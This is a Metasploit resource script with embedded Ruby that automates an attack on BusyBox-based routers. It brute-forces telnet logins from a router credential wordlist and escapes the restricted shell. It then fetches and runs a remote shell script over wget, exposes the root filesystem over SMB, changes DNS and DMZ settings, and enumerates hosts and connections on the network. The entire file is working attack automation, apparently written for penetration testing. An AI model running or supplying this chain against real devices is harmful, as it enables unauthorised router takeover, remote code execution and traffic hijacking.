# auto_busybox.rc
# Author: Javier Vicente Vallejo (Web: http://vallejo.cc / Twitter: @vallejocc)

<ruby>

def prepare_session()
  run_single("sessions -K")
  run_single("use auxiliary/scanner/telnet/telnet_login")
  run_single("set userpass_file C:/metasploit/apps/pro/msf3/data/wordlists/routers_userpass.txt")
  run_single("set STOP_ON_SUCCESS true")
  run_single("set RHOSTS #{framework.datastore['RHOSTS']}")
  run_single("set VERBOSE yes")
  run_single("run")
  sleep 1
  framework.sessions.each_key do |session|
    print_status("Running against session #{session}")
  	sleep 1
  	run_single("use post/linux/manage/busybox_jailbreak")
  	run_single("set SESSION #{session}")
  	run_single("set VERBOSE yes")
  	run_single("run")
  	sleep 1
  	return session
  end
end

if (framework.datastore['RHOSTS'] == nil)
	print_status("you have to set RHOSTS globally ... exiting")
	return
end

print_line("")
print_line("starting ...")
print_line("")

session=prepare_session()
run_single("use post/linux/manage/busybox_wgetandexec")
run_single("set URL http://192.168.1.128/test.sh")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1

session=prepare_session()
run_single("use post/linux/manage/busybox_smb_share_root")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1

session=prepare_session()
run_single("use post/linux/gather/busybox_enum_hosts")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1

session=prepare_session()
run_single("use post/linux/gather/busybox_enum_connections")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")		
sleep 1

session=prepare_session()
run_single("use post/linux/manage/busybox_setdmz")
run_single("set TARGETHOST 192.168.1.128")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("set DELETE false")
run_single("run")		
sleep 1
		
session=prepare_session()
run_single("use post/linux/manage/busybox_setdmz")
run_single("set TARGETHOST 192.168.1.128")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("set DELETE true")
run_single("run")		
sleep 1

session=prepare_session()
run_single("use post/linux/manage/busybox_setdns")
run_single("set SRVHOST 8.8.8.8")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")	
sleep 1

session=prepare_session()
run_single("use post/linux/gather/busybox_pingnet")
run_single("set IPRANGESTART 192.168.1.1")
run_single("set IPRANGEEND 192.168.1.10")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1


#session=prepare_session()
#run_single("use post/linux/manage/busybox_control")
#run_single("set SESSION #{session}")
#run_single("run")
#sleep 1
#run_single("sessions -i #{session}")


</ruby>



